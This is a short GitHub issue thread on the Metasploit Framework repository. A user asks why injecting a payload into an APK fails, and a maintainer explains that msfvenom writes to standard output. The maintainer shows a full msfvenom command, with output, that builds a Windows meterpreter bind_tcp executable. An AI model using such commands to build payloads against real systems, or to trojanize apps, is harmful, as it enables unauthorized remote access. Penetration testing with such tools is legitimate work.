### ISSUE TITLE
wtf is this?

### ISSUE THREAD

**Issue by azamet90** [rapid7/metasploit-framework#12749]
![image](https://user-images.githubusercontent.com/44042178/71235019-f0d00b00-230b-11ea-8a12-59ed0ac45f7e.png)
this happens if i try to inject payload to apk

**Comment by bcoles** [comment]
`msfvenom` outputs to stdout by default

**Comment by azamet90** [comment]
im not asking this i mean it is not creating and adding at the end 1:2c1 etc...

**Comment by bcoles** [comment]
`msfvenom` outputs to standard output by default. On Kali, you can use `>` to redirect standard output to a file.

For example:

```
root@kali:~/Desktop/metasploit-framework# ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > i-am-a-file
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 309 bytes
Final size of exe file: 73802 bytes
root@kali:~/Desktop/metasploit-framework# file i-am-a-file 
i-am-a-file: PE32 executable (GUI) Intel 80386, for MS Windows
root@kali:~/Desktop/metasploit-framework# 
```

You can learn more about `msfvenom`, including learning how to use `msfvenom`, on the [How-to-use-msfvenom](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom) wiki page. For example, you can choose the `-f` flag to specify the output format and `--help-formats` to list the available formats.
